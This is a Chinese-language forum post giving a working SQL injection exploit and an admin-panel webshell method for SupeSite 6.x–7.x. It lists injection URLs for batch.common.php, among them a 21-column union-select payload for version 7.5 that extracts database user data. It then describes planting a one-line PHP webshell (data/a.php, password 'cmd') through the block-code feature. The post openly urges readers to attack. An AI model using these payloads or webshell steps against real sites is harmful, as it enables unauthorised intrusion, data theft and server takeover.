SupeSite 通杀注射以及后台getshell

试了6.x 7.x 其他版本没测试, 大家自己测试下吧

我们再看看tname函数

依然没过滤, 他都不管了你了 你还不注入吗?
exp:
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments [sql] #
这个后面可以直接order by了 你懂的
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx #

由于版本不同, 所以字段数不一样, 建议先orderby判断下来, 比如7.5的, 就是21个字段, 直接丢个7.5的exp吧
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23

也可以配置好了,直接丢注入攻击跑
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2

关于SupeSite 7.5后台GETSHELL
新的拿shell方法, 和uchome的如出一辙

http://www.xxx.com/admincp.php?action=usrblocks&blocktype=&op=addblockcode

调用:http://www.xxx.com/batch.javascript.php?bid=1650 ,即在data下生成一句话木马a.php,密码为cmd

附上一个中转的脚本

直接拿着工具就可以跑了

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录